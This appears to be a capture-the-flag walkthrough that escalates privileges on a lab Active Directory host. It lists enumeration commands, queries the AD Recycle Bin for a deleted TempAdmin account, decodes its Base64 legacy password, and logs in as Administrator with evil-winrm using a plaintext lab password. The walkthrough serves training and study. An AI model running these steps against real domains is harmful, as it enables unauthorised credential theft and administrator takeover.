Privilege Escalation Using AD Recycle Bin

1. Enumerate Group Membership

To begin, let's first check the group memberships of the current user by running the following command:

whoami /all

Example Output:

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------
User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106

GROUP INFORMATION
-----------------
Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

In the Group Information section, we notice that the user is a member of the CASCADE\AD Recycle Bin group, which is important for the next steps.

2. Understanding the AD Recycle Bin

The Active Directory Recycle Bin is a feature that allows administrators to recover deleted Active Directory objects such as Users, Groups, and Organizational Units (OUs). These objects retain their properties while in the Recycle Bin and can be restored when needed.

3. Enumerating the AD Recycle Bin for Deleted Objects

To list the deleted objects from AD Recycle Bin, use:

Get-ADObject -ldapfilter "(&(isDeleted=TRUE))" -IncludeDeletedObjects

The -IncludeDeletedObjects flag ensures that deleted entries are also retrieved.

4. Filtering for Deleted User Accounts

To only retrieve deleted user accounts:

Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects

This will narrow down the result to just users who are deleted.

5. Identifying the TempAdmin Account

Refine the search to locate a specific deleted account (e.g., TempAdmin):

Get-ADObject -ldapfilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *

This will list all properties for TempAdmin, including sensitive ones like legacy passwords.

6. Decoding the Base64 Encoded Password

Suppose the property cascadelegacyPwd contains a Base64-encoded password. Decode it using:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('<Base64StringHere>'))

This will reveal the plaintext password.

7. Exploit the Same Password for the Administrator Account

From previous hints (like email leaks), if Administrator reused the same password, you can login:

evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

This should give you full access!

8. Read the Root Flag

Once logged in as Administrator, navigate to the Desktop or appropriate directory and grab the root flag.

cd C:\Users\Administrator\Desktop
type root.txt

Mission accomplished!

PreviousAbusing gMSA Password Access in Penetration Testing Nextblood-hound

Last updated 1 month ago

hashtag1. Enumerate Group Membership

hashtag2. Understanding the AD Recycle Bin

hashtag3. Enumerating the AD Recycle Bin for Deleted Objects

hashtag4. Filtering for Deleted User Accounts

hashtag5. Identifying the TempAdmin Account

hashtag6. Decoding the Base64 Encoded Password

hashtag7. Exploit the Same Password for the Administrator Account

hashtag8. Read the Root Flag